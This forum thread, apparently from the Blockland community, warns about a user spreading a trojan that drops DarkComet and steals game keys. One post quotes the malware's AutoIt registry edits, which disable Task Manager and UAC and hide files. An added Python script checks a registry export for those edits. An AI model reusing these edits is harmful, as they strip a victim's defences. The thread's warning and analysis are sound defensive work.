Author Topic: LSD - Spreading RAT | Claims to have multiple BL slaves | Lot's keys |  (Read 6008 times)

http://forum.blockland.us/index.php?topic=241459.msg6891481#msg6891481
These songs are really good but I don't want to download it because I fear it's got the virus in it.


ftfy
Because it totally takes more than a few clicks to change your IP.


I don't believe this is a RAT more than it is a Trojan.
It seems to disable a stuff ton of functions and registries.

Code:
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")

Also writes itself to start up and disables methods of killing it. I think even removing anti-viruses from booting up at start up.

Please revoke this guy and all those stolen keys.
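A defender-side check for the registry changes listed in the post above, as an added example that is not part of the original thread. The function name `audit_reg_export` and the sample export are constructed for illustration, and the sketch assumes a regedit-style text export covering both HKCU and HKLM, with AutoIt's `HKCU64`/`HKLM64` prefixes mapped to the full hive names.

```python
import re

# Tampered states written by the posted script (key paths lower-cased,
# since registry paths are case-insensitive). HKCU64/HKLM64 -> full hive names.
TAMPERED = {
    (r"hkey_current_user\software\microsoft\windows\currentversion\policies\explorer", "nofolderoptions"): 1,
    (r"hkey_current_user\software\microsoft\windows\currentversion\explorer\advanced", "showsuperhidden"): 0,
    (r"hkey_current_user\software\microsoft\windows\currentversion\policies\system", "disabletaskmgr"): 1,
    (r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system", "enablelua"): 0,
}
# Key the posted script deletes; absence is a hint to review, not proof.
DELETED_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\spp\clients"

KEY_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

def audit_reg_export(text):
    """Return sorted findings for a registry export in regedit text format."""
    findings, seen_keys, key = [], set(), None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1).lower()
            seen_keys.add(key)
            continue
        m = DWORD_RE.match(line)
        if m and key:
            name, value = m.group(1).lower(), int(m.group(2), 16)
            if TAMPERED.get((key, name)) == value:
                findings.append(f"{key}\\{name}={value}")
    if DELETED_KEY not in seen_keys:
        findings.append(f"missing key: {DELETED_KEY}")
    return sorted(findings)

# Constructed sample export, not taken from a real host.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000005
'''

if __name__ == "__main__":
    for finding in audit_reg_export(SAMPLE):
        print(finding)
```

Files saved by regedit are UTF-16 encoded, so decode them with `encoding="utf-16"` before passing the text in.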

Are you loving joking
whatd you expect guys it was 3 in the morning and my brain was fried

I don't believe this is a RAT more than it is a Trojan.
It seems to disable a stuff ton of functions and registries.
The main point of the script is to decrypt and execute a copy of DarkComet (and most likely other things too), and to prevent the user from shutting it down.

The main point of the script is to decrypt and execute a copy of DarkComet (and most likely other things too), and to prevent the user from shutting it down.
No edit: Here's a simple virustotal check of the decrypted file: https://www.virustotal.com/file/302f038f0a677da3099139721d098d3d87af280a6d744dcf1c491849f95955ab/analysis/1389380113/

Because it totally takes more than a few clicks to change your IP.
But then it's a federal offense.  If this kid is stupid enough to hand this out and welcome drama, he'd do it again and then be in really deep stuff.

But then it's a federal offense.  If this kid is stupid enough to hand this out and welcome drama, he'd do it again and then be in really deep stuff.
Please explain how changing your IP should be a 'federal offense' and how that should matter at all if he doesn't live in the US.

Please explain how changing your IP should be a 'federal offense' and how that should matter at all if he doesn't live in the US.

I think changing your IP after committing a crime online is a federal offense.
But yeah tough stuff if he doesn't live in the US.

I think changing your IP after committing a crime online is a federal offense.
But yeah tough stuff if he doesn't live in the US.
Dynamic IPs change all the time... or he could just use a vpn... unless he's a handicap and does this without any precautions.

http://forum.blockland.us/index.php?topic=241459.msg6891481#msg6891481
I want to say Bishop has been hijacked/is linked to LSD as well, since he seems to have downloaded it and he recently posted a few links on my server to a file download that has similar results on a virustotal scan as
No edit: Here's a simple virustotal check of the decrypted file: https://www.virustotal.com/file/302f038f0a677da3099139721d098d3d87af280a6d744dcf1c491849f95955ab/analysis/1389380113/

I'm assuming he is planning to sell them 70% like in Minecraft. I thought that selling BL keys was pretty much impossible because if the IP location constantly changes it would get detected or something?

I want to say Bishop has been hijacked/is linked to LSD as well, since he seems to have downloaded it and he recently posted a few links on my server to a file download that has similar results on a virustotal scan as

I don't want to accuse him, but maybe they know each other? I saw that when I made that post earlier.

Quote
ID: 31337
my id is 33559 :O